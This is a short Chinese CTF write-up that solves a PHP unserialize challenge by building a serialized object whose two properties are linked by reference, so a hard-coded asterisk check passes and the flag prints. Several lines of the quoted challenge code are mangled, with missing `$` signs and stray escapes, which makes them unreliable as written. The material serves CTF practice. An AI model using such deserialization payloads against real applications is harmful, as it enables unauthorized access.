今日例题:
<?php
highlight_file(FILE);
error_reporting(0);
include("flag.php");
class just4fun {
var $enter;
var $secret;
}
if (isset($_GET['pass'])) {
pass = _GET['pass'];
pass=str_replace('\*','\\\*',pass);
}
o = unserialize(pass);
if ($o) {
$o->secret = "*";
if (o-\>secret === o->enter)
echo "Congratulation! Here is my secret: ".$flag;
else
echo "Oh no... You can't fool me";
}
else echo "are you trolling?";
?>
这道题目其实很容易,其实就构造序列化字符串使enter=secret,但是secret已经写死了,变成*,我貌似只能给enter赋值*才能满足条件,但是 pass=str_replace('\*','\\\*',pass);这里我只要写入*就会被替换成\,所以现在问题变成了怎么在不写入*的情况下让enter=secret,这时就要使用引用漏洞。
引用漏洞:相当于创建了一个快捷方式,可以让你去访问,但是我又不是直接去对原对象赋值。
&$a->secret这里就是一个引用,在前面加个&符号就好
据陈腾师傅所说,所以这道题目的关键根本不在于他们是否都是*,而是在于他们相等,只要加个&就好了
代码如下:
<?php
class just4fun{
var $enter='*';
var $secret;
}
$a= new just4fun();
$a->enter=&$a->secret;
echo serialize($a);
希望本文能够帮助大家。
